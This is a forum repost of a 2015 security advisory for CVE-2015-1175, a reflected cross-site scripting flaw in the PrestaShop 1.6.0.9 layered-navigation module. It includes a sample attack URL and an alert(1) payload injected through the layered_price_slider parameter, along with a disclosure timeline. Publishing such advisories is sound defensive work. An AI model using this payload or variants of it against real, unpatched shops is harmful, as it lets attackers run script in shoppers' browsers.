1488 Posted January 21, 2015 Report Posted January 21, 2015 CVE-2015-1175-xss-prestashopInformation——————–Advisory by Octogence.Name: Reflected XSS Vulnerability in prestashop ecommerce softwareAffected Software : PrestashopAffected Versions: 1.6.0.9 and possibly belowVendor Homepage : https://www.prestashop.com/Vulnerability Type : Cross-site ScriptingSeverity : HighCVE ID: CVE-2015-1175Impact——An attacker can craft a URL with malicious JavaScript code whichexecutes in the browser.Technical Details—————–Sample URL:http://localhost/prestashop/prestashop/modules/blocklayered/blocklayered-ajax.php?layered_id_feature_20=20_7&id_category_layered=8&layered_price_slider=16_532f363<img%20src%3da%20onerror%3dalert(1)>9c032&orderby=position&orderway=asctrue&_=1420314938300Parameter:layered_price_sliderSample Payload:<img src=a onerror=alert(1)>For more information on cross-site scripting vulnerabilities read thefollowing article:https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)Advisory Timeline (mm/dd/yyyy)——————–01/07/2015 – Reported01/12/2015 – Vulnerability Fixed01/18/2015 – Advisory Releasedhttp://octogence.com/advisories/cve-2015-1175-xss-prestashop/RegardsSudhanshuOctogence Tech SolutionsNoida, IndiaMobile | +91-9971658929Website| www.octogence.comSource : Prestashop 1.6.0.9 Cross Site Scripting ? Packet Storm 1 Quote